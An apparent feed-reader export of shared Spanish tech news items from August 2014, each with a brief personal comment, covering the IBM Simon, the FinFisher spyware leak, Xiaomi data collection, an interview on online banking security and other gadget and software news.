Shared posts

18 Aug 10:21

Feliz veinte cumpleaños, IBM Simon Personal: la imagen de la semana

by Juan Carlos
Miguelangelr

Parece grande pero al paso que vamos pronto lo superaremos

simon.jpg

Tal día como hoy, 16 de agosto, en 1994 se ponía a la vente el IBM Simon Personal. Quizá los más mayores se acuerden de él pero aunque su presencia fuera muy discreta en su día, este modelo es el padre, o el abuelo más bien, de todos los smartphones que usamos hoy en día. Sí amigos, aunque nos parezca un concepto muy moderno desde hace veinte años estos dispositivos habitan entre nosotros.

Eso sí, en su día no se le conocía como un smartphone pero tenía muchas de las funciones que estos dispositivos tienen hoy en día: calendario, herramientas para tomar notas y enviar correos electrónico... Todo ello, claro, con las funciones de un teléfono móvil convencional. ¿No os da un poco de nostalgia ver ese diseño cuadrado tan noventero?

Medio kilo de peso, una hora de batería

Con un peso de 500 gramos y una pantalla LCD verde con un tamaño, que no proporciones, similar a la de un iPhone 4 fue un terminal pionero que se puso a la venta en Estados Unidos vendiendo unas 50.000 unidades en su día. Nada mal teniendo en cuenta que se trataba de un dispositivo de nicho para empresarios y ejecutivos que necesitaban estar conectados todo el día.

Eso sí, tenía unos cuantos fallos que hacían que su ambición se derrumbara. El precio no ayudaba (899 dólares de hace veinte años es mucho dinero) ni tampoco una batería que duraba un suspiro: 1 hora de autonomía. Las ventas como os digo no son malas pero ya veis que había dos razones de peso para no decidirse por él.

El próximo mes de octubre el terminal entrará en una galería dedicada a la era de la información que estrena ese mismo mes el museo de las ciencias de Londres. Si tenéis oportunidad de ir yo no lo dudaría ya que además del IBM Simon Personal se exhibirán otros dispositivos que han marcado y definido esta etapa.

Vía | BBC

-
La noticia Feliz veinte cumpleaños, IBM Simon Personal: la imagen de la semana fue publicada originalmente en Xataka por Juan Carlos.








18 Aug 10:13

Los gobiernos que nos espían y cómo lo hacen: Se filtra el código de FinFisher y sus clientes

by noreply@blogger.com (Maligno)
Miguelangelr

Bichos, bichos más bichos

En el mundo del ciberespionaje existen algunas empresas que se han dedicado a crear piezas de software para infectar y controlar los equipos de las personas vigiladas. Dicho así suena a que son empresas que hacen herramientas de hacking para hacer botnets e instalar R.A.T.s en los equipos de sus víctimas. Y es cierto, es lo que hacen, lo que sucede es que su objetivo es que lo utilicen los países y gobiernos dentro de la legalidad vigente de su país. 

Este tipo de herramientas las hemos visto muchas veces en incidentes en el pasado. Por ejemplo, cuando el grupo Anonymous hackeao la empresa HBGary, entre muchos de los servicios que esta empresa vendía al gobierno de los Estados Unidos, se encontró información de Task B y 12 Monkeys, el software de espionaje que vendía al gobierno.

Figura 1: Detalles del Rootkit "Task B"

En el caso de las revueltas populares en Egipto durante la Primavera Árabe, se pudo ver como el gobierno de El Cairo habría comprado FinFisher, el software de espionaje de la empresa Gamma. Este software ha sido famosos en muchos otros incidentes de espionaje de Internet, y en el informe de "Enemigos de Internet" se pudo ver cómo aparecía en muchos sitios. 

Figura 2: Detalle de la factura de Gamma al gobierno de Egipto. Clic para ver entera y saber el coste

A la lista de software de espionaje hay que sumar también a la empresa Hacking Team, quienes están detrás del desarrollo de Galileo, un malware de espionaje que se ha hecho popular este tiempo atrás por ser descubierto que para infectar los terminales iPhone espera a que se conecte el equipo a un terminal pareado y le realiza el jailbreak completo para luego instalar el troyano. 

El filtrado del material de FinFisher

Esta semana pasada, la noticia ha sido la filtración del código y los documentos de información de la empresa Gamma, lo que ha permitido saber mucho más de FinFisher y su troyano para dispositivos móviles FinSpy, además de conocer muchos de los clientes de la empresa. El filtrado se ha hecho a través de una cuenta de Twitter que se dedica a filtrar todo lo que puede de FinFisher, llamada @GammaGroupPR, y donde están los enlaces a todo el material que se ha liberado.

De los clientes ya se habían detectado dónde se encontraban los clientes por la ubicación de las direcciones IP de los paneles de control, que habían sido localizados en 25 países. Sin embargo, ahora, analizando diferentes detalles de toda la información que ha sido publicada se puede inferir una lista mucho más detallada de ellos, que ha sido publicada en Pastebin.

Figura 4: Algunos de los clientes inferidos en la filtración.
Lo curioso es que algunos de los clientes han aparecido tras analizar los metadatos de los documentos adjuntos en los correos electrónicos a los que se ha tenido acceso, lo que demuestra una vez que cualquier pieza de información extra puede ser utilizada. Otros de las claves PGP que se usan para intercambiar información cifrada.

Figura 5: Más clientes de FinFhiser inferidos

Por supuesto, también han salido filtrados nombres de los miembros del equipo de Gamma, así que se los estará buscando en las próximas conferencias de seguridad y hacking....

El código de FinSpy

Otro de los aspectos que se deseaba conocer es cómo funciona el software de FinSpy, del que se conocer mucha información por medio de los vídeos de promoción filtrados en el pasado. Por ejemplo, se sabe que usando un man in the middle se usa el truco de ofrecer una actualización de Flash a los clientes o que en el pasado se ha utilizado un bug de Evil Grade en Apple iTunes para infectar equipos OSX, pero no se tenían detalles del código.


Figura 6: Vídeo de promoción de FinSpy Mobile
Por ejemplo, se pudo saber en el pasado cómo funcionaba el troyano de espionaje de FinSpy para iOS, para lo que usan un Provisioning Profile, técnica conocida para el hacking de iPhones, o fraudulentas para Android, pero ahora se puede acceder al código fuente de las R.A.T.S. de BlackBerry, Symbian, Windows Mobile o Android, en diferentes versiones, lo que da mucha más información de cómo está construido este software.

Figura 7: Versiones de FinSpy de FinFisher filtradas. Clic para descargar el zip

Al final es un malware más, solo que con ellos supuestamente está creado para ser utilizado bajo supervisión legal, pero... algunos de sus clientes parece que se han hecho la ley a su medida. Por supuesto, no todos los países tiran de este tipo de software comercial, y ya hemos visto que la NSA tiene su batería de herramientas del grupo ANT para esto - de las cuales puedes hacerte con alguna para jugar en NSA PlaySet - y que el GCHQ tiene los suyos propios.

En fin, centrándonos en la parte técnica, seguro que disfrutas, y si estabas buscando un proyecto de investigación para una Conferencia, un Proyecto de Fin de Carrera o Máster, el analizar el funcionamiento de estos bichos seguro que es interesante.

Saludos Malignos!
18 Aug 10:07

Windows Threshold Tech Preview puede llegar a finales de septiembre, según ZDNet

by F.Manuel
Miguelangelr

Lo probaré

Menú de inicio de Windows 8, y aplicaciones en ventanas

Continúan los rumores sobre Windows Threshold. Esta vez se trata del posible lanzamiento de una vista previa técnica a finales de septiembre o primeros de octubre, según informa Mary Jo Foley, de ZDNet. El lanzamiento de esta versión previa sería similar a la Developer Preview de Windos 8 lanzada el 13 de septiembre de 2011.

En esta ocasión, y siempre según la fuente citada, los que instalen esta vista previa tendrán que aceptar las actualizaciones automáticas mensuales que se liberarán con posterioridad. Windows Threshold Tech Preview será público y accesible para todos los usuarios.

Threshold es la próxima gran versión de Windows, cuyo debut se espera para 2015, sin que por el momento se haya precisado cuándo. Probablemente se llame Windows 9, y estará enfocado a facilitar su uso entre los devotos del teclado y ratón.

Microsoft está siendo muy hermético con respecto a las características de Threshold, y lo único que se conoce sobre ellas es a través de rumores no confirmados, como un nuevo menú de inicio, aplicaciones Modern UI se podrán ejecutar en ventana independiente, escritorios virtuales, la probable eliminación de la Charms bar, y la integración completa de Cortana en el sistema operativo.

No hay constancia de que Windows Threshold vaya a seguir el camino de lanzamientos de Windows 8 (Developer Preview, Consumer Preview y RTM) , y tal vez esta vista previa técnica sea la única antes del debut del sistema operativo.

Vía | ZDNet

-
La noticia Windows Threshold Tech Preview puede llegar a finales de septiembre, según ZDNet fue publicada originalmente en Genbeta por F.Manuel.


18 Aug 10:05

La Premier League, contra quienes publican los goles en las redes sociales

by Manu Mateos
Miguelangelr

Es una sensación mía o es que a todo el mundo le da por prohibir absolutamente todo. Cuanto más años pasan
, más cosas se prohíben. ¿Esto es libertad en el siglo XXI o simplemente se prohíbe para hacer negocio? Que se prohíban las armas es lógico. Que se prohíba la información es negocio.

Balón de fútbol

La liga de fútbol inglesa, en declaraciones a la BBC de boca de su director de comunicaciones Dan Johnson, es tajante: "compartir los goles en las redes sociales es ilegal" (en el Reino Unido, claro). Y anuncian que van a empezar a pedir a los aficionados al fútbol que dejen de hacer algo que, durante los últimos meses, ha sido cada vez más normal.

Imaginad la situación: estamos viendo un partido de fútbol, vemos un gol que nos impresiona, rebobinamos un poco con el mando de la televisión (o los controles del reproductor en streaming) y lo capturamos para compartirlo en forma de GIF animado o de vídeo corto en Vine, Facebook o Twitter. Durante el pasado mundial era posible seguir prácticamente todos los goles a través de las redes sociales, sin siquiera poner la televisión ni estar suscrito a ninguna plataforma.

Y la Premier League considera que esto es una infracción de su propiedad intelectual. Por ello, además, están desarrollando tecnologías de crawling para encontrar e identificar GIF animados y vídeos en Vine de manera automática.

También es comprensible que otras compañías estén en contra: Sky Sports y BT Sports han pagado tres mil millones de libras por los derechos de distribución; además, The Sun y The Times son los titulares de los derechos de distribución online y se posicionan, como es imaginable, en contra. The Sun, sin ir más lejos, requiere una suscripción a The Sun+ (ocho libras mensuales) para poder ver los goles. Si en Twitter los comparten gratis...

Yo, personalmente, lo veo poner puertas al campo. Por muy ilegal que sea en el Reino Unido y por muy en contra de los términos de servicio de Vine que vaya subir clips con goles de fútbol de la Premier League, los usuarios lo van a seguir haciendo, y lo van a acabar haciendo antes, incluso, de que en la cadena de televisión hayan terminado de transmitir la repetición de la jugada. Y, aunque llevan tiempo poniendo trabas a los clips en YouTube, no creo que vayan a comenzar a tomar acciones legales contra todos los usuarios que hacen esto.

Mucho más inteligente me parece la postura de la LFP y de Mediapro (titular de muchos de los derechos del fútbol español): su cuenta @LaLiga y su canal de YouTube se encargan de publicar tanto los goles como los propios resúmenes de los partidos.

Vía | BBC
En Genbeta | Prohibido decir "Mundial de fútbol"
Imagen | Raúl Hernández González (CC-BY 2.0)

-
La noticia La Premier League, contra quienes publican los goles en las redes sociales fue publicada originalmente en Genbeta por Manu Mateos.








15 Aug 12:23

CCleaner for Android v1.04.24 Multilenguaje (Español), Mantén tu Android Limpio, Seguro y Rápido

by contacto@intercambiosvirtuales.org (IVTEAM)
Miguelangelr

Empezando a limpiar Android.

Datos Técnicos
CCleaner for Android v1.04.24 Multilenguaje
Spanish Incl. | Free | ANDROiD | 1.0 MB
Descripción
Mantén tu Android limpio, seguro y rápido utilizando CCleaner!

Piriforme, los fabricantes de PC más popular del mundo y de limpieza de software Mac traer CCleaner para Android.
Quite basura, recuperar espacio, supervisar el sistema y navegar con seguridad. Conviértete en el amo de su propio dispositivo con la aplicación de limpieza definitiva para tu Android!

VISITA WWW.INTERCAMBIOSVIRTUALES.ORG PARA VER EL RESTO DEL CONTENIDO

© 2014 IntercambiosVirtuales.org. All Rights Reserved.

15 Aug 12:14

Internet Explorer 11 muestra un mayor rendimiento

by Isidro Ros
Miguelangelr

Ya tengo Windows 8.1 corriendo en mi viejo Dell y tengo que decir que se mueve muchísimo mejor que Windows 8 y la experiencia de usuario es muy buena y fluida. De momento iguala y supera Windows 7. Van por buen camino.

La llegada de la actualización de agosto para Windows 8.1 nos ha dejado algunas pequeñas mejoras que también han afectado al conocido navegador de Microsoft. Gracias a dicha actualización  considerable que, sin duda, mejora la experiencia de uso de este[...]






13 Aug 11:50

Steve Ballmer is the owner of the LA Clippers

by Richard Lawler
Miguelangelr

Ahora se meten en el deporte. ¿Qué será lo siguiente?

The legal wrangling and lawsuits are done and it's official, the NBA has announced that former Microsoft CEO Steve Ballmer is now the owner of the Los Angeles Clippers. He paid a reported $2 billion for the team, the highest sale price for a...
13 Aug 09:21

El conector reversible USB Type-C está finalizado y listo para su fabricación

Miguelangelr

Problema, convertirse en un nuevo estándar

El conector reversible USB Type-C está finalizado y listo para su fabricación


El grupo USB 3.0 Promoter Group ha anunciado la finalización del diseño del conector reversible USB Type-C. La nueva especificación ya se ha transferido al USB Implementers Forum (USB-IF) para supervisar la producción del nuevo conector, aunque todavía no se cuenta con una fecha concreta de lanzamiento. El nuevo USB Type-C se puede conectar en ambas direcciones y presenta un tamaño similar a los puertos Micro USB (Micro-B). Según el grupo promotor, el rediseño está pensado para encajar en smartphones o tabletas, pero también en dispositivos de más tamaño como portátiles. La nueva… Leer noticia completa y comentarios »
13 Aug 08:53

KitKat is now running on more than 20 percent of Android devices

by Jon Fingas
Miguelangelr

Menos el mío, que estoy esperando la actualización como agua de mayo.

In case there was any doubt that KitKat now has a solid foothold in the Android world, Google just offered some proof. Its usage data for early August shows that KitKat is on more than a fifth of active Android devices, at 20.9 percent. That's a...
13 Aug 08:47

NVIDIA explains why its 64-bit chip should be Android's speed champ

by Jon Fingas
NVIDIA set out to claim the Android performance crown when it unveiled its 64-bit Tegra K1 processor at the start of the year, and it's now ready to explain why it expects to come out on top. The chip's two Project Denver cores will have an edge...
12 Aug 22:35

Lion Cosplay Artificial Wool Wig for Pet Dog - Dark Brown

Miguelangelr

Muy bueno :-)

SKU #: 338976, Price: US$35.20 free shipping
Color custom10000
Material Artificial wool
Quantity 1 Piece
Suitable For Dog
Packing List 1 x Pet wig
11 Aug 21:03

TrueNorth es el chip de IBM con el que quieren emular el cerebro humano

by Pablo Espeso
Miguelangelr

4096 nucleos

IBM TrueNorth chip

IBM tiene entre manos un nuevo proyecto: su nombre es TrueNorth, y está cómo no íntimamente relacionado con el mundo de los procesadores. La compañía, con más de cien años de historia, ha creado TrueNorth basándose en la estructura del cerebro humano.

Su comportamiento, asegura IBM, emula al de un cerebro real, y es capaz de procesar 'grandes' cantidades de información a través de sus 5,4 miles de millones de transistores. IBM ha creado una estructura similar a la neuronal pero con transistores y, avisan, con un cierto grado de simplificación. El cerebro humano es aún un elemento demasiado complejo como para emularlo a través de la tecnología, algo que ya discutimos cuando hablamos del Human Brain Project de la UE.

IBM TrueNorth chip

IBM empezó a desarrollar TrueNorth en 2011 con un primer prototipo de un núcleo. La versión actual contiene 4096 núcleos neurosinápticos, una nueva categoría de núcleos que definen en su página web y con los que buscan reorientar el mundo de la computación hacia nuevos campos y posibilidades. Según IBM, el potencial de TrueNorth es muy alto no sólo en lo relativo a las capacidades de cómputo, si no también al reducido consumo energético: su actual chip consume sólo 0,063 vatios, una fracción de lo que consumen las CPU de nuestros ordenadores domésticos.

TrueNorth es uno de esos proyectos sin un destino definido, ya que no está muy claro cómo se usará en el futuro ni qué aplicaciones palpables tendrá en la industria. No obstante habrá que seguirla muy de cerca, ya que puede ser una de las claves de la informática del futuro a un largo plazo.

Vía | IEEE, Reuters, Hexus

-
La noticia TrueNorth es el chip de IBM con el que quieren emular el cerebro humano fue publicada originalmente en Xataka por Pablo Espeso.








11 Aug 10:50

VIDEO2BRAIN: Unity 4 (2014)

by contacto@intercambiosvirtuales.org (IVTEAM)
Miguelangelr

La PUM ;-)

Datos Técnicos
VIDEO2BRAIN Unity 4 (2014)
ISO | 743 MB (398 MB) | Spanish | VIDEO2BRAIN | Vídeo Training | Formador: Enrique López Mañas | Duración: 4:39 horas | Fecha de publicación: 28-may-2014
Descripción
Enrique López Mañas te presenta su curso Unity 4. Descubre esta herramienta de creación de videojuegos.

Unity es el motor de construcción de videojuegos multiplataforma más popular del mercado, que nos permite crear desde sencillas aventuras 2D hasta complejos juegos 3D en primera persona.

En este curso aprenderemos a usar Unity 3D y desarrollar videojuegos bajo este entorno multiplataforma. Unity es el motor de construcción de videojuegos más popular y utilizado en el mercado, permitiendo crear desde sencillas aventuras 2D hasta complejos videojuegos 3D en primera persona. El curso se desarrolla y ejecuta sobre Android, aunque Unity permite exportar a otras plataformas.

  • Introducción a Unity, al entorno de desarrollo y a las herramientas
  • Creaciones de Interfaces Gráficas con Unity
  • Trabajando con mallas, materiales y animaciones en Unity
  • Efectos de cámara e iluminación
  • Touch & Tilt con móviles
  • Audio
  • Exportación a otras plataformas

Durante el curso se desarrollarán tres videojuegos diferentes: un tres en raya, un entorno de disparos con un tanque y un arcade en 3D con naves espaciales. Se proporcionará el código fuente y los proyectos utilizados durante el curso en proyectos importables dentro de Unity 3D..

VISITA WWW.INTERCAMBIOSVIRTUALES.ORG PARA VER EL RESTO DEL CONTENIDO

© 2014 IntercambiosVirtuales.org. All Rights Reserved.

11 Aug 10:48

La entrevista que los bancos no querrían publicar

by Colaborador
Miguelangelr

Me recuerda a una conferencia a la que asistí hace años. El responsable de e-banking no usababa sus propios servicios porque no se fiaba de ellos ...

Los bancos y las empresas relacionadas con el sector financiero, lo consideran un especialista de seguridad informática y a la vez una preocupación para sus sistemas.

Su nombre es Oscar Banchiero, un especialista en el área de seguridad de la información y trabaja para uno de los proveedores de comunicaciones más importantes del país, es instructor internacional contando con varias certificaciones importantes, ofrece sus servicios de enseñanza en universidades, y es considerado por grandes empresas, una fuente importante de consultas y asesoramientos sobre sistemas de seguridad informáticos.

Seguridad en los Bancos La entrevista que los bancos no querrían publicar

Mi pregunta obligada: usas Homebanking?

“Si por supuesto, que vea fallas en casi todos, no significa que no lo deba utilizar, tampoco es para ser tan paranoico, dado que el problema viene por dos lados que trabajan en conjunto: el usuario y el servicio”

Así empieza esta entrevista, con una respuesta directa al problema que viene siendo una pesadilla para algunos, como por ejemplo: “me robaron el saldo de mi cuenta” o “seguramente fue una falla en el sistema”, donde el punto en común está relacionado con los incidentes de robos financieros a través de la informática.

Hace cuanto que estas relacionado con este tema de la seguridad informática?

“Más de 20 años, pasando por varias tecnologías, sistemas y dispositivos. Por suerte tuve un buen acceso a todo, mis padres me regalaban lo que yo les pedía y así podía ponerme al tanto de lo nuevo.

He trabajado siempre en sectores involucrados con la tecnología y la comunicación, donde pude hacer mis primeros pasos a través de una manera de llamar gratis al exterior, por intermedio de una placa que me regalaron.

Hoy en día, aparte de mi trabajo, doy charlas y cursos tanto aquí como en el exterior y trato de ponerme al día con los incidentes actuales, pero es complicado porque cada vez hay más y no hay tiempo.

Me intereso mucho aprender el uso de los lectores magnéticos y tuve acceso a muchos diagramas y soluciones de mejoras de los mismos, lo que me hace acordar que hace un buen tiempo me había conseguido uno, en una época que recién empezaban a salir los cajeros automáticos.

A propósito, son seguros?

Muchos se sorprenderían de cómo son internamente, hay videos en Internet, de algunos locos que le meten un juego dentro, o de que pueden cambiar el sistema, mostrando un mensaje lo que obviamente asustarían a muchos.

En nivel técnico, cada vez están mejor preparados, pero es increíble cómo sale un modelo nuevo de cajero y a la semana ya está el dispositivo llamado skimmer, para insertarlo y usarlo en el mismo.

Contanos desde un principio porque pasan estas cosas a las que uno no está acostumbrado directamente con los cambios de la tecnología.

“Esto sucede de hace rato, los teclados virtuales se crearon como una medida más de seguridad, al principio se hablaba de instalar un programa residente en una máquina que capture las pulsaciones del teclado (keylogger) y así uno podría tener a mano el password de acceso a la cuenta bancaria.

Para evitar esto, aparte de que siempre se aconseja que se tenga un antivirus actualizado, se quiso evitar el uso del teclado para el ingreso a la cuenta, para que no queden rastros de las pulsaciones, entonces se crean los teclados virtuales.

La mayoría de los mismos, trabajan de la misma manera, guardan en memoria (de la PC o del dispositivo en uso) los datos que necesitamos insertar para poder acceder a nuestra cuenta, entonces así se evita el uso del teclado físico.”

Entonces podemos considerarlo que es seguro?

“Nada es seguro, muchos comentamos la misma línea de siempre y es tal cual “NO EXISTE LA SEGURIDAD AL 100%”, el teclado virtual no es seguro, nuestros dispositivos no son seguros y nosotros no somos seguros. La mayoría de los incidentes no son por un tema externo, sino por una falla en el ser humano, que la podemos llamar de varias maneras: confianza de que uno la tiene clara, desinterés porque piensa que nunca le va a pasar, desconocimiento total de una buena implementación de seguridad”

Como es eso? Nosotros no somos seguros? pero obviamente no vamos a entregar nuestros datos… o sí?

“Si piensas de esa manera, estas equivocado, no se tiene idea de las mil maneras que hay de obtener los datos, no pasa todo por un link o un sitio web, ni tampoco por el teclado virtual, pasa por la cabeza de uno, todos piensan: que tan seguro estamos que lo que hacemos está bien? Hay alguien que nos pueda decir si estamos haciendo lo correcto? Y la respuesta se la dan a sí mismo: no tengo ganas de consultar a nadie porque “creo” que está bien lo que hago y ahí está el error.”

Ok se entiende el concepto, pero porque no hay una solución que aminore estos incidentes?

“Soluciones siempre salen, pero tarde, y los que salen beneficiosos con los incidentes, siempre están un paso adelante nuestro, es así, hay que aprender a aceptarlo y por eso ser precavido.

No guiarse de que tenemos el ultimo parche de seguridad o que tenemos el mejor antivirus, eso ayuda pero no es la solución definitiva, muchos deberían tomar conciencia antes de lo que pasa, no?

Hablas de precavido, eso no es lo que hacemos al usar el teclado virtual?

“Ya te lo había dicho, el teclado virtual es una gran mentira”, es totalmente vulnerable, dado que la información que introducís en el mismo, queda en la memoria en casi el 95% de todos los que existen,  entonces si un intruso tuviera acceso a la memoria del dispositivo en uso, tranquilamente se queda con la clave de entrada y si no es posible sacarla de ahí, lo que hagen es capturar una foto de la pantalla cada vez que el usuario hace click y la pagina del banco esta abierta, consiguiendo el código numérico de esta forma.

No puede ser tan fácil, y porque los negocios relacionados con el sistema financiero no lo mejoran?

“Lo hacen, pero ya te dije, son dos los que inician este problema, el usuario y el sistema, uno mejora el otro empeora, o viceversa, no hay una solución completa, al menos no la veo a corto plazo.

El problema se conoce, se sabe, pero las soluciones a veces uno las puede considerar de bajo nivel, pero peor es no hacerlas!!!”

En conclusión, el sistema financiero relacionado con la informática, esta vulnerable?

“Tienes alguna duda todavía? es increíble la cantidad de mensajes fraudulentos (phishing) que se manda, en 5 minutos podes aprender a realizar la clonación de un sitio, no se necesita ser experto para hacer este tipo de técnicas de ataque. La tecnología para poder realizarlo está al alcance de todos, desde un troyano in-detectable hasta comprar datos de una tarjeta de crédito a través de Internet, así que no digan que no es vulnerable, al parecer a muchos no les conviene que se sepan estas cosas, por un tema de imagen, presencia, etc.”

 

Artículo escrito por Oscar Banchiero, Especialista Seguridad Informática CEH – CCNP SECURITY @Banchiero para La Comunidad DragonJAR.

11 Aug 10:34

Apple aprueba un cliente de BitTorrent que sólo deja descargar desde dónde él quiere

by Ildefonso Gómez
Miguelangelr

Una mierda más

Blue Downloader

Todos sabemos que Apple ha sido siempre muy reticente con los clientes BitTorrent. Si iTunes ha tenido alguna vez una aplicación de este tipo, la ha eliminado al poco tiempo de estar disponible. Insertar un programa así en la tienda se ha convertido en una tarea casi imposible. Decimos casi, porque por fin la compañía ha aprobado un cliente que nos dejará descargar desde redes P2P. Aunque con ciertas limitaciones.

Blue Downloader es, a primera vista, una aplicación más. Un software que, si lo instalamos, nos permitirá descargar contenidos mediante BitTorrent. Ya hemos dicho que tiene limitaciones: el desarrollador del producto ha decidido limitar el número de sitios desde los cuales podemos realizar descargas. Y esa ha sido la principal razón por la que Apple ha aprobado la inclusión del proyecto.

El programa tiene varias características que lo hacen muy interesante, si. Pero si intentamos descargar desde, por ejemplo, The Pirate Bay, nos será imposible. De hecho, tiene una lista con sitios de confianza. Y esos sitios serán las únicas fuentes desde las cuales podremos obtener ficheros. En el documento se encuentran algunas páginas web como archive.org o Bitlove. Aunque desconocemos si se ampliará próximamente.

El objetivo del desarrollo: iTunes

Blue Downloader

Tyler Harryson, la persona encargada de la programación de Blue Downloader, ya ha explicado que su principal objetivo con el cliente era el de personalizarlo para poder publicarlo en la tienda de Apple:

Apple es muy restrictiva en los programas de BitTorrent, por lo que tome precauciones limitando la aplicación. No estoy a favor de las restricciones, pero quería que me admitiera el programa en la tienda.

Parece que la estrategia ha funcionado, ya que Blue Downloader era publicado hace muy poco en iTunes, y todavía se encuentra disponible. De todas formas, parece que Harryson tendrá que seguir tomando las mismas precauciones. En caso contrario, no sería raro que la empresa de la manzana decidiera eliminar el programa.

Como curiosidad, tenemos que mencionar que Blue Downloader también podría llegar a Google Play (la solicitud ya ha sido emitida) aunque, en esta ocasión, el programa se publicaría sin ningún tipo de limitación. Es decir, si Google decide aprobarla, podríamos descargar desde donde quisiéramos.

Por el momento, Blue Downloader sigue estando disponible en iTunes, por lo que podéis echarle un vistazo. La aplicación cuesta 2,69 euros, si la compramos desde la filial española.

Vía | TorrentFreak
Más información | Blue Downloader | iTunes
En Genbeta | TorrenTV: streaming de torrents directamente a un Apple TV

-
La noticia Apple aprueba un cliente de BitTorrent que sólo deja descargar desde dónde él quiere fue publicada originalmente en Genbeta por Ildefonso Gómez.


11 Aug 10:34

Bing y Google Maps aumentarán la resolución de las imágenes de satélite

by F.Manuel
Miguelangelr

Pues si ya tiene una resolución muy buena no quiero ni imaginarme lo que puede ser esto. Nos vemos a todos mirando al cielo y sonriendo para la foto :-)

bing-maps-madrid.jpg

Las imágenes de satélite que proporcionan dos de los grandes servicios de mapas, Bing y Google Maps, pronto pueden ver aumentada su resolución hasta los 50 cm. Si tenemos en cuenta las actuales resoluciones que brindan ambos servicios (entre 10 y 5 metros), podéis imaginar el cambio.

Esto va a ser posible gracias a que la normativa del Gobierno de EE.UU. sobre este tipo de imágenes se ha relajado, y la empresa DigitalGlobe, de la que Google y Bing son clientes, va a lanzar en los próximos días el satélite WorldView-3, cuyas cámaras son capaces de brindar la mencionada resolución mientras orbita la Tierra a 383 millas (616 km), de altura.

Lo que resulta impresionante a nivel tecnológico, se convierte en preocupante cuando pensamos en la privacidad. De momento y durante seis meses, DigitalGlobe no va a poner en circulación las imágenes obtenidas, que estarán sólo a disposición de las agencias de inteligencia gubernamentales con fines de identificación.

Vía | Neowin
Vídeo | YouTube

-
La noticia Bing y Google Maps aumentarán la resolución de las imágenes de satélite fue publicada originalmente en Genbeta por F.Manuel.


11 Aug 10:07

Xiaomi lanza una actualización OTA que desactiva las conexiones automáticas en sus terminales

Miguelangelr

En cuanto lis han cazao cómo han reaccionado los muy cabrones.... se nota que sabían lo que pasaba, porque una ROM no la sacas en 2 días..

Xiaomi lanza una actualización OTA que desactiva las conexiones automáticas en sus terminales


Tras varias semanas de rumores, la firma de seguridad F-Secure confirmaba hace unos días que los terminales Xiaomi envían datos a servidores chinos sin autorización previa. Según el test realizado por la empresa finlandesa, el teléfono Xiaomi RedMi 1S comparte inadvertidamente datos como el nombre del operador, el número de teléfono del usuario o los números de teléfono almacenados en la lista de contactos. Después de publicar una primera aclaración sobre los rumores iniciales, el vicepresidente global de Xiaomi y "ex" de Google, Hugo Barra, se ha vuelto a referir al polémico… Leer noticia completa y comentarios »
10 Aug 10:18

Utilizan un gato para detectar redes Wi-Fi vulnerables y hackearlas

Miguelangelr

Si la WiFi la detecta y hackea un gato, ¿sería ilegal?, ¿habría que denunciar al gato?. El autor del delito es gato, puesto que voluntariamente se ha paseado por el vecindario con una aplicación que hackea wifis.....

Utilizan un gato para detectar redes Wi-Fi vulnerables y hackearlas


Que la picaresca humana no tiene límites es sabido por todos, por ello tal vez no sorprenda tanto que durante el reciente encuentro sobre hacking DEF CON de Las Vegas, se haya presentado un sistema para detectar vulnerabilidades en las redes Wi-Fi de nuestro barrio y de este modo poder resolver su contraseña, pero ¿y si nuestro sistema de hacking tiene como protagonista a un gato? En Wired nos ponen al tanto de la conferencia realizada durante la convención por el experto en seguridad Gene Bransfield, en la que mediante el título ¿Cómo convertir a tus mascotas en armas? se plantea la… Leer noticia completa y comentarios »
09 Aug 20:36

F-Secure confirma que los terminales Xiaomi envían datos a servidores chinos sin autorización

Miguelangelr

¿No lo hacen Apple, Microsoft y Google? Es normal que los chinos quieran saberlo todo de todos...

F-Secure confirma que los terminales Xiaomi envían datos a servidores chinos sin autorización


La firma de seguridad F-Secure ha corroborado en su laboratorio que un terminal Xiaomi envía datos de usuario a un servidor localizado en China sin permiso previo. La comprobación de la empresa finlandesa llega después de que el fabricante oriental acallara los rumores sobre "conexiones secretas" aparecidos a mediados de julio. La alarma sobre los móviles Xiaomi llegó al ojo público después de que un usuario del foro hongkonés IMA Mobile observara conexiones automáticas desde un RedMi Note. Según el primer informe, el terminal envía fotografías y SMS a IPs localizadas en China siempre… Leer noticia completa y comentarios »
09 Aug 20:33

Acaba de aparecer Pangu 1.2. La 'herramienta' imprescindible para iOS :)

by Posted by pharizna
Miguelangelr

Para los manzaneros ;-)

Afortunadamente ha quedado muy lejos aquel mes de agosto en el que un reducido grupo de "amigos" decidió dejarnos y lanzarse a la aventura por su cuenta. Lo que menos nos gustaron fueron las amenazas que durante tiempo nos estuvieron haciendo después contra nuestro trabajo y nuestra familia.

Aunque estaba claro que el tiempo daría la razón al que la tenía lo que no habíamos pensado ni en sueños que en la última reunión de presentación de nuestro último proyecto ante la alta Dirección de una compañía energética española... nos permitimos invitarles a visitar nuestra página si querían seguir informados de todos estos temas :)

Entre otras cosas, surgió el tema del Jailbreak que les resultaba desconocido aunque la gente de IT se apresuró a definir como "craquear" el dispositivo de Apple mientras yo apostaba por el concepto de "mejorarlo"... como había hecho con mi iPAD2 que les enseñé.

Hablando de este tema hace un par de horas acaba de salir la última versión de Pangu 1.2 ...
08 Aug 12:14

Las mujeres dedican más tiempo y dinero a los juegos móviles que los hombres, según un estudio

Miguelangelr

Lo puedo corroborar

Las mujeres dedican más tiempo y dinero a los juegos móviles que los hombres, según un estudio


Las mujeres invierten más tiempo y dinero jugando en dispositivos móviles que los hombres, según un estudio de la firma de análisis Flurry. Las cifras del informe revelan que las jugadoras móviles pasan un 35% más de tiempo en aplicaciones de juego y realizan un 31% más de compras in-game que los jugadores. El estudio también destaca que las mujeres son "más leales" a los juegos móviles que los hombres. Por término medio, los jugadores abandonan los juegos móviles tras siete días con un 42% más de frecuencia que las jugadoras. Como parte del mismo estudio, Flurry ha medido el tiempo… Leer noticia completa y comentarios »
08 Aug 12:11

Con BTindex puedes saber las IPs de todos los que están descargando un determinado torrent

by Ildefonso Gómez
Miguelangelr

Solución: TOR

BTindex

Mientras que son muchísimos los usuarios que se están quebrando la cabeza para descargar contenidos de forma anónima, utilizando para ello multitud de herramientas, lo cierto es que otros sitios web no están tomando muchas precauciones al respecto. Normalmente, ante las descargas mediante BitTorrent, las IP no son datos que se publiquen en la red. Pero BTindex, un buscador de torrents abierto al público hace unas semanas, está mostrando estas direcciones a todo aquél que quiera saberlas.

